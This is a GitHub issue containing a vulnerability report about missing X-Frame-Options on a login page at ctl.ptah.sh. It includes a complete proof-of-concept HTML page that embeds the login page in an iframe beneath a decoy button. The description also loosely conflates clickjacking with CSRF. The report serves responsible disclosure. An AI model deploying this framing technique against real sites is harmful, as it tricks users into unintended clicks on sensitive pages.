Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Clickjacking #213

Open
bohdan-shulha opened this issue Oct 6, 2024 · 0 comments
Open

Clickjacking #213

bohdan-shulha opened this issue Oct 6, 2024 · 0 comments
Labels
security triage

Comments

@bohdan-shulha
Copy link
Contributor

Reported by Kunal Mhaske [email protected]

Vulnerability Name: Clickjacking

Target URL: https://ctl.ptah.sh/login

Vulnerability Description :

Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Typically there is one type of attack - cross-site request forgeries (CSRF) that can interact with functions on other websites.

This vulnerability affects the Web Server.

<html>
<head>
<title>Clickjack test page</title>
</head>
<style>
#myBtn{

z-index: 999;
position: absolute;
top: 100px;
right: 50px;
color: white;
background-color: red;
}
</style>



<body>
<!-- <h1> A Sample Test Page </h1>
<p>Website is vulnerable to clickjacking! </p>

<p>Avoid random clicks </p> -->
<div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%; height:70%">
<iframe src="https://ctl.ptah.sh/login" width="100%" height="100%" >

</iframe></div>
<div align="right" style="position:absolute; top:1; left:0; z-index:1; width: 70%;height:60%; text-align:left;">
<a href="https://www.bing.com/"><button id="myBtn"> click here</button></a>

<!-- <a href="https://ctl.ptah.sh/login">Open Modal</button></a> -->
<div id="myModal" class="modal">

<!-- Modal content -->


</div>
</body>
</html>

2.save it as .html eg s.html
3. and just simply open that. And click on the button directly https://bing.com/
As far as I know, this data is enough to prove that your site is vulnerable to Clickjacking.
@bohdan-shulha bohdan-shulha added this to the October milestone Oct 6, 2024
@github-actions github-actions bot added the triage label Oct 6, 2024
@bohdan-shulha bohdan-shulha removed this from the October milestone Nov 2, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
security triage
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bohdan-shulha